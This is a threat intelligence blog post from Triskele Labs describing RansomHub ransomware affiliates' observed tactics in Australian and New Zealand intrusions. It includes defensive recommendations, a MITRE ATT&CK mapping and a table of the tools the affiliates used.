Prepared by: Richard Grainger, Global Head of Digital Forensics
A ransomware group that emerged in 2024 has been operating inside Australian and New Zealand networks for an average of 69 days before detection; quietly mapping environments, identifying backup weaknesses, and stealing sensitive data before pulling the trigger on encryption. RansomHub, a financially motivated threat actor operating under a ransomware-as-a-service (RaaS) model, targeted organisations across healthcare, finance, manufacturing, education, and government. Triskele Labs conducted direct incident response to eight RansomHub-related intrusions, providing firsthand insight into how affiliates operate - and what defenders can do to close the gaps they exploit.
Who is RansomHub?
RansomHub is a financially motivated ransomware group that emerged in 2024 and operates under a ransomware-as-a-service (RaaS) model — meaning the group develops and maintains the ransomware platform while independent affiliates carry out the actual intrusions in exchange for a share of ransom payments.
They are known for aggressive double extortion: affiliates both encrypt victim environments and exfiltrate sensitive data, then use a dark web leak site to pressure organisations into paying. Those that do not comply face public exposure of their stolen information.
RansomHub primarily targets enterprise Windows environments and has affected organisations across a broad range of sectors, including healthcare, finance, manufacturing, education, and government.
Triskele Labs has conducted direct response to eight RansomHub-related incidents, providing direct insight into the group’s operational behaviour.
RansomHub’s activity across Triskele Labs investigations shows a consistent pattern of deliberate compromise designed to maximise leverage.
RansomHub affiliates exfiltrate sensitive data while also encrypting systems. This enables them to pressure victims with both operational disruption and the threat of publishing stolen information.
One defining characteristic observed is an extended dwell time. On average, RansomHub affiliates maintained access to compromised networks for up to 69 days before detection or encryption. This longer access window enables thorough reconnaissance and significantly increases the blast radius when ransomware is finally deployed.
Affiliates pay special attention to identifying how backup systems operate and where backup coverage is weak. This allows them to deliberately target recovery pathways, reducing a victim’s ability to restore without paying.
Rather than deploying custom malware, affiliates use legitimate administrative tools already present in the environment for movement and execution. This reduces detection opportunities, as the activity can blend in with normal IT operations.
Data exfiltration is commonly performed using Rclone — a command-line tool originally designed for syncing files to cloud storage services such as Dropbox, Google Drive, and OneDrive. Affiliates repurpose it to quietly transfer stolen data out of the network. The group also employs a distributed, multi-layer command-and-control (C2) infrastructure and uses anonymisation techniques such as VPNs, compromised third-party services, and tunnelling via Cloudflared — a tool from Cloudflare that creates encrypted tunnels, used here to maintain persistent, hidden access into compromised environments. Tools like Netexec — a network execution framework used to authenticate and run commands across systems at scale — have also been observed in use across engagements.
In late March 2025, RansomHub abruptly ceased operations and removed their infrastructure from the dark web. Shortly thereafter, rival ransomware group DragonForce claimed that RansomHub had joined its platform, suggesting a shift toward a decentralised ransomware cartel model. This change fragmented RansomHub’s affiliate network, with some affiliates moving to other groups such as Qilin, while others appeared to disband entirely.
Since then, the group has remained largely silent, creating uncertainty about future activity. Organisations should continue monitoring for activity consistent with former RansomHub affiliates operating under new banners.
The following defensive actions align directly to behaviours observed across Triskele Labs RansomHub incident response engagements.
Reduce exposure to credentialed remote access pathways
RansomHub intrusions have involved VPN-based access using valid credentials, including both domain and local accounts. To reduce the likelihood of credentialed remote access being abused:
Audit VPN authentication and account hygiene, including local VPN accounts
Strengthen authentication controls for remote access, with a focus on preventing misuse of valid accounts
RansomHub is a financially motivated RaaS operation known for double extortion and a deliberate, patient approach to compromise. Across Triskele Labs investigations, affiliates demonstrated extended dwell time averaging 69 days, methodical reconnaissance, a strong focus on backup systems, and heavy reliance on legitimate tooling to blend into normal administrative activity. Exfiltration via Rclone and persistent access via Cloudflared-style tunnelling were recurring themes, alongside common defence evasion actions such as security tooling interference and Windows event log clearing.
In late March 2025, RansomHub ceased operations and removed its infrastructure from the dark web, followed by claims of alignment with DragonForce and fragmentation of the affiliate ecosystem. The group’s subsequent silence has created uncertainty around future activity.
MITRE ATT&CK Mapping
|
Tactic |
Technique |
Description |
|
Initial Access |
T1133 – External Remote Services |
VPN was used to remotely access the environment |
|
Initial Access |
T1078.002 – Valid Accounts: Domain Accounts |
Valid credentials were used to gain access to the network |
|
Initial Access |
T1078.003 – Valid Accounts: Local Accounts |
Local accounts for the VPN were used to gain access |
|
Execution |
T1543.003 – Create or Modify System Process: Windows Service |
A system process was created or modified |
|
Discovery |
T1046 – Network Service Discovery |
Network services were scanned to identify active systems and open ports |
|
Discovery |
T1135 – Network Share Discovery |
Systems were scanned to identify network shares |
|
Discovery |
T1087.002 – Account Discovery: Domain Account |
Domain account information was collected |
|
Lateral Movement |
T1021.001 – Remote Services: Remote Desktop Protocol |
RDP was used to move laterally within the environment |
|
Defence Evasion |
T1562.001 – Impair Defences: Disable or Modify Tools |
Security tooling was disabled or modified |
|
Defence Evasion |
T1070.001 – Indicator Removal: Clear Windows Event Logs |
Event Logs were cleared to hide activity |
|
Defence Evasion |
T1550.002 – Use Alternate Authentication Material: Pass the Hash |
Pass the Hash was used for some RDP connections |
|
Collection |
T1039 – Data from Network Shared Drive |
Data was collected from network shares |
|
Collection |
T1074 – Data Staged |
Data was staged centrally before exfiltration |
|
Impact |
T1486 – Data Encrypted for Impact |
Data was encrypted, rendering systems inoperable |
|
Exfiltration |
T1567.002 – Exfiltration Over Web Service: Cloud Storage |
Data was uploaded to cloud storage |
|
TOOL |
PURPOSE |
|
Cloudflared |
Tunnelling tool used to bypass perimeter protections and establish resilient access |
|
Rclone |
Used for data exfiltration to cloud storage |
|
Netexec |
Used for lateral movement and credential validation |
|
Anonymising infrastructure |
VPNs and compromised third-party services used for obfuscation |
|
Anti-analysis binaries |
Payloads may include obfuscation and anti-debugging protections |
Qilin
https://www.triskelelabs.com/blog/qilin-on-the-rise-what-australian-organisations-need-to-know
State of Cyber: TA
https://www.stateofcyber.com.au/report/dfir#threat-actors-are-getting-smarter.
Reinfection/persistence
https://www.triskelelabs.com/blog/how-threat-actors-regain-access-after-ransomware-attack
Kairos
https://www.triskelelabs.com/blog/kairos-changing-the-ransomware-playbook